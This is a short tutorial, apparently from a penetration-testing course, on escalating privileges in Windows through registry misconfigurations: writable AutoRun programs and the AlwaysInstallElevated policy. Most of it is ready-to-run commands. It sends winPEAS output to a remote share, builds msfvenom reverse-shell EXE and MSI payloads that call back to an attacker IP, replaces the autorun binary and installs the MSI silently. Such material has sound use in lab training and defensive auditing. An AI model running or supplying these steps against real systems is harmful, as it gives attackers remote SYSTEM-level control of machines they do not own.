Windows Privilege Escalation - Registry Exploits
Windows can be configured to run commands at startup, this process is called AutoRun. These AutoRuns are configured in the Registry. If you are able to write to an AutoRun executable, and are able to restart the system (or wait for it to be restarted) you may be able to escalate privileges.
Using winPEAS, get the application information of the target machine:
.\winPEASany.exe quiet applicationsinfo > \\10.4.5.83\tools\appinfo.out
The output reveals that there is an autorun application called programs.exe which allow anyone to modify it.
If we would like to do enumeration manually, simply use the command below:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
To verify the permission of the program.exe, we will use accesschk.exe.
As you can see, Everyone group has a write permission.
Next step is to create an executable reverse shell using msfvenom:
msfvenom -p windows/shell_reverse_tcp lhost=10.4.5.83 lport=53 -f exe > shell.exe
Transfer it to target machine and replace the program.exe.
copy /Y shell.exe "C:\Program Files\Autorun Program\program.exe"
Then restart the target machine:
When the admin authenticates to the target machine or if the machine automatically authenticates itself then we should get a shell.
Windows provides a group policy setting that allows a regular user to install a system-privileged Microsoft Windows Installer Package (MSI).
To make this work, two Registry settings must be enabled. The AlwaysInstallElevated value must be set to 1 or 0x01 in both local machine and current user. If either of these are disabled, the exploitation will not work.
First, use winPEAS to see if both registry values are set:
.\winPEASany.exe quiet windowscreds > \\10.4.5.83\share\info.out
Alternatively, you may use reg query:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Then create a reverse shell with msi file format.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.4.5.83 LPORT=53 -f msi > shell.msi
Transfer the file to target machine and run the following command:
msiexec /quiet /qn /i shell.msi